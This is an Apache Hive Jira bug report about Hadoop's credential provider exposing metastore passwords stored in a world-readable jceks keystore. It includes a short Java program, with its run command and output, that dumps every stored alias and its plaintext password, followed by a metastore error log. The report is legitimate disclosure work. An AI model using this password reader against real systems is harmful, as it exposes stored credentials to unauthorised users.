Uploaded image for project: 'Hive'
  1. Hive
  2. HIVE-19746

Hadoop credential provider allows to read passwords for every user



    • Type: Bug
    • Status: Open
    • Priority: Blocker
    • Resolution: Unresolved
    • Affects Version/s: None
    • Fix Version/s: None
    • Component/s: Security
    • Labels:


      This simple program allows to read any password from any jceks file:

      package com.test.app;
      import java.util.List;
      import org.apache.hadoop.conf.Configuration;
      import org.apache.hadoop.security.alias.CredentialProvider;
      import org.apache.hadoop.security.alias.CredentialProviderFactory;
      import java.io.IOException;
      public class PasswordReader {
        public static void main(String[] args) throws IOException {
          if (args == null || args.length == 0){
            throw new IllegalArgumentException("Credential provider path is to set");
          String credentialProviderPath = args[0];
          Configuration configuration = new Configuration();
          configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);
          CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
          List<String> aliases = credentialProvider.getAliases();
          for(String alias : aliases){
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
      java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader  jceks://hdfs/user/hive/hivemetastore.jceks


      javax.jdo.option.connectionpassword = 123456

      File jceks://hdfs/user/hive/hivemetastore.jceks has -rw-r--r-- permissions and hdfs:hdfs owner:group. We can't remove world readable permissions here, because Hive is configured for impersonation to allow users user than hdfs connect to HiveServer2. When removed world readable permissions and tried to connect as other user, I got the exception:

      2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
      2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
          at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
          at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)

      Any ideas how to protect passwords (let's say restrict access to jceks://hdfs/user/hive/hivemetastore.jceks to 600) and at the same time be available to connect to HS2 as not admin user?


          Issue Links



              • Assignee:
                osayankin Oleksiy Sayankin
                osayankin Oleksiy Sayankin
              • Votes:
                0 Vote for this issue
                4 Start watching this issue


                • Created: